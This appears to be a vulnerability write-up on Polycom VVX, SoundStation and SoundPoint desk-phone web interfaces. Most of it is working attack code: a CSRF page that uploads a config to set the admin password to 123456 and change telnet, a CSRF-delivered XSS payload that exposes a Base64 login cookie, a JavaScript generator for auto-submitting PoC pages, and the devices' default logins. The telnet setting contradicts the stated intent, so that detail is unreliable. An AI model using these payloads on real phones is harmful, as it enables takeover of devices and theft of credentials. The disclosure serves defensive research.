Poly(com) VVX, Soundstation IP 5000, SoundPoint IP 335 Vulnerabilities

Phone Model: VVX 311
Part Number: 3111-48350-001 Rev:A
MAC Address: X
IP Mode: IPv4
IP Address: X
UC Software Version: 5.9.1.0615
Updater Version: 5.9.7.12459

This web GUI appears to be similar to, or the same as, the SoundPoint's, and most POST requests appear vulnerable to CSRF. I can just take out the cookie login/pass that is in each request and craft a CSRF. For example, the following is a CSRF example that changes the admin password and turns on telnet. This works for the VVX model; however, the same CSRF did not work for the SoundStation and SoundPoint.

<html>
  <!-- Polycom VVX 5.9.1.0615 CSRF - Changes Admin pass to 123456. Also turns telnet on, login Polycom/123456 -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/192.168.128.11\/form-submit\/Utilities\/configuration\/importFile", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------402251386101268401375671906");
        xhr.withCredentials = true;
        var body = "-----------------------------402251386101268401375671906\r\n" + 
          "Content-Disposition: form-data; name=\"myfile\"; filename=\"polycomtelnet.cfg\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\x3cdevice device.set=\"1\"\x3e\n" + 
          "\x3cauth device.auth.localAdminPassword.set=\"1\" device.auth.localAdminPassword=\"123456\"/\x3e\n" + 
          "\x3ctelnet diags.telnetd.enabled=\"0\"\x3e\x3c/telnet\x3e\n" + 
          "\r\n" + 
          "-----------------------------402251386101268401375671906--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>


This sends a file called polycomtelnet.cfg, which looks like this (the same content the script embeds in the multipart body):

<device device.set="1">
<auth device.auth.localAdminPassword.set="1" device.auth.localAdminPassword="123456"/>
<telnet diags.telnetd.enabled="0"></telnet>



Phone Model: SoundStation IP 5000 & SoundPoint IP 335 (same firmware)
Part Number: 3111-30900-001 Rev:H
MAC Address: X
IP Address: X
UC Software Version: 4.0.14.1388
BootROM Software Version: 5.0.14.0580

This is a POST XSS delivered via CSRF that the newest firmware of both the SoundStation and the SoundPoint is vulnerable to. Since the session is carried in a simple "Cookie: Authorization=" header whose value is Base64, exposing the cookie through the XSS makes the login easy to decode.

<html>
  <!-- Post XSS via CSRF on Soundstation IP 5000 & SoundPoint IP 335 UC ver 4.0.14.1388  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.128.17/form-submit" method="POST">
      <!-- payload is HTML-encoded so it is submitted as the field value instead of being rendered in this page -->
      <input type="hidden" name="250:1" value="&quot;&gt;&lt;Script&gt;alert(document.cookie)&lt;/Script&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
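
The two PoC pages above are hand-edited request captures, and the second one shows how easy it is to break a payload by pasting it straight into a value attribute. The following is an added example, not code from the original post, of a small generator for both styles of PoC: a form page whose field values are HTML-escaped so that a quote-breaking XSS payload is actually submitted to the target, and a multipart/form-data body for the VVX importFile upload. The host, boundary, field names and cfg content used in the usage call at the bottom are taken from the post's examples; nothing here contacts a phone.

```javascript
// Added example (not from the original post): generators for the two kinds of
// CSRF PoC shown above. Hosts, boundary and field names below are assumptions
// copied from the post's captures.

// Escape a value for use inside a double-quoted HTML attribute. Without this,
// a payload such as "><Script>... closes the attribute in the attacker's own
// page and the browser submits an empty field instead of the payload.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Auto-submitting form page for a plain POST (the SoundStation / SoundPoint
// case). `fields` maps form field name -> value; every value is escaped.
function buildFormPoc(action, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `    <input type="hidden" name="${escapeAttr(name)}" value="${escapeAttr(value)}" />`)
    .join("\n");
  return [
    "<html>",
    "  <body>",
    "  <script>history.pushState('', '', '/')</script>", // hide the PoC path in the address bar
    `    <form id="csrf" action="${escapeAttr(action)}" method="POST">`,
    inputs,
    "    </form>",
    "    <script>document.getElementById('csrf').submit();</script>",
    "  </body>",
    "</html>",
  ].join("\n");
}

// multipart/form-data body carrying one file field (the VVX importFile case).
// `boundary` is the value from the Content-Type header; each part line starts
// with "--" + boundary, lines end in CRLF, and the final boundary ends in "--".
function buildMultipartBody(boundary, fieldName, filename, fileContent) {
  return (
    `--${boundary}\r\n` +
    `Content-Disposition: form-data; name="${fieldName}"; filename="${filename}"\r\n` +
    "Content-Type: application/octet-stream\r\n" +
    "\r\n" +
    fileContent + "\r\n" +
    `--${boundary}--\r\n`
  );
}

// Usage with the values from the post (constructed; nothing is sent).
const xssPage = buildFormPoc("http://192.168.128.17/form-submit", {
  "250:1": '"><Script>alert(document.cookie)</Script>',
});
const cfg =
  '<device device.set="1">\n' +
  '<auth device.auth.localAdminPassword.set="1" device.auth.localAdminPassword="123456"/>\n' +
  '<telnet diags.telnetd.enabled="0"></telnet>\n';
const uploadBody = buildMultipartBody(
  "---------------------------402251386101268401375671906",
  "myfile", "polycomtelnet.cfg", cfg);
console.log(xssPage);
console.log(uploadBody.length + " byte multipart body");
```

To turn the multipart body into a request, send it with fetch or XMLHttpRequest using credentials: 'include' (withCredentials = true) and the same boundary in the Content-Type header, as the VVX PoC above does; the form-page variant needs no script at all beyond the auto-submit.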


Most of these devices ship with the default logins user/123 and admin/456. However, if the company setting them up has changed those, these CSRF vulnerabilities could be useful.
